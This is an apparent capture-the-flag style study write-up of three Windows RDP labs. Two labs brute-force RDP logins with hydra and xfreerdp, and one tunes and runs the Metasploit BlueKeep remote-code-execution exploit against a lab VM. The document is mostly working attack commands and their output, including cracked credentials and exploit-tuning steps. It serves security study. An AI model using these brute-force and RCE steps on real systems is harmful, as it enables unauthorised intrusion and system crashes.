🏠 Home BlogGitHub📚 Buy Me a Book

🔬RDP

Lab 1

🔬 Windows: Insecure RDP Service

  • Target IP: 10.4.18.131

  • RDP exploitation

  • Dictionaries to use:

    • /usr/share/metasploit-framework/data/wordlists/common_users.txt

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

Enumeration

ping 10.4.18.131

nmap -sV 10.4.18.131
PORT      STATE SERVICE        VERSION
135/tcp   open  msrpc          Microsoft Windows RPC
139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3333/tcp  open  ssl/dec-notes?
49152/tcp open  msrpc          Microsoft Windows RPC
49153/tcp open  msrpc          Microsoft Windows RPC
49154/tcp open  msrpc          Microsoft Windows RPC
49155/tcp open  msrpc          Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

  • Use Metasploit rdp_scanner module to check if port 3333 is running RDP.

msfconsole
use auxiliary/scanner/rdp/rdp_scanner
set RHOSTS 10.4.18.131
set RPORT 3333
run
Metasploit rdp_scanner

📌 The RDP is exposed on target port 3333, and not on the default port 3389.

RDP Brute-force

  • Try hydra to find valid username and password

hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.18.131 -s 3333
[3333][rdp] host: 10.4.18.131   login: sysadmin   password: samantha
[3333][rdp] host: 10.4.18.131   login: demo   password: victoria
[3333][rdp] host: 10.4.18.131   login: auditor   password: elizabeth
[3333][rdp] host: 10.4.18.131   login: administrator   password: qwertyuiop
hydra

  • freerdp cannot be used in this lab

  • Use xfreerdp to connect to target via RDP

xfreerdp /u:administrator /p:qwertyuiop /v:10.4.18.131:3333
xfreerdp RDP connected
Reveal Flag: 🚩

port-number-3333

Lab 2 - BlueKeep (Extra)

🔬 Home Lab

I have prepared a vulnerable Windows 2008 R2 Virtual Machine and connected it to the same network of the Kali virtual machine. On the server, I have activated RDP service on default port 3389.

  • Host system: Kali Linux

  • Target system: Windown Server 2008 R2 - IP 192.168.31.131 - Administrator:Eternal17010

  • Exploitation tool:

  • Vulnerability: CVE-2019-0708 - BlueKeep

  • Targeting Kernel space memory and apps can cause system crashes.

  • The attacker can remotely execute arbitrary code by gaining access to a chunk of kernel memory, without authentication.

  • BlueKeep PoC's (Proof of Concepts) and exploits could be malicious in nature, use only verified exploit code and modules.

Metasploit BlueKeep modules

  • Target RDP activated:

Enumeration

nmap -sV -sC 192.168.31.131
nmap -sV -sC 192.168.31.131

  • 📌 RDP Port 3389 is open

Exploitation

msfconsole
search bluekeep
use 0 # Module auxiliary/scanner/rdp/cve_2019_0708_bluekeep ID
set RHOSTS 192.168.31.131
exploit
Metasploit cve_2019_0708_bluekeep
search bluekeep
use 1 # Module exploit/windows/rdp/cve_2019_0708_bluekeep_rce ID
set RHOSTS 192.168.31.131
show targets
set target 5
exploit
Metasploit cve_2019_0708_bluekeep_rce
Win Server 2008 R2 crash

Kernel CRASH can be caused by this exploit, so pay attention on production environment

Adjusting the exploit

Finding the NPP

  • To make the exploit work, it needs the correct GROOMBASE value which is the start address of the Non Paged Pool area (NPP).

  • The NPP address can be extracted from a memory dump of the target machine.

  • In VMWare, take a snapshot of the target virtual machine (Win Server 2008 R2).

    • Download the vmss2core tool

    • From the VM (virtual machine) folder copy the .vmem and .vmsn files to the vmss2core tool folder

    • Run the tool to generate a memory.dmp file

.\vmss2core-sb-8456865.exe -W "WinSrv_2008_R2_x64-Snapshot1.vmsn" "WinSrv_2008_R2_x64-Snapshot1.vmem"

  • Run WinDbg and open the memory.dmp file

    • Run !polfind a to get a message

    • That is the start of address of Non Page Pool, in this case fffffa8018c08000

WinDbg

  • Edit the exploit and set the GROOMBASE variable if not already set.

    • In my case it is already set as the above address, for the 2008 R2 (6.1.7601 x64 - VMWare 15.1) target number 5.

  • Save the exploit file and run reload_all in the Metasploit interface.

  • Set the GROOMSIZE to 50.

msfconsole
search bluekeep
use 1 # Module exploit/windows/rdp/cve_2019_0708_bluekeep_rce ID
set RHOSTS 192.168.31.131
show targets
set target 5
set GROOMSIZE 50
exploit
BlueKeep RCE Success

Lab 3 (Extra)

Windows RDP: Dictionary Attack

  • Target IP: 10.4.22.41

  • RDP exploitation

  • Dictionaries to use:

    • /usr/share/metasploit-framework/data/wordlists/common_users.txt

    • /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

nmap 10.10.4.22.41

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt rdp://10.4.22.41 -s 3389
xfreerdp /u:administrator /p:bubbles /v:10.4.22.41
# default port is 3389
Reveal Flag: 🚩

sysadmin-stephaie-123

Previous🔬SMB - PsExecNext🔬WinRM

Last updated

Was this helpful?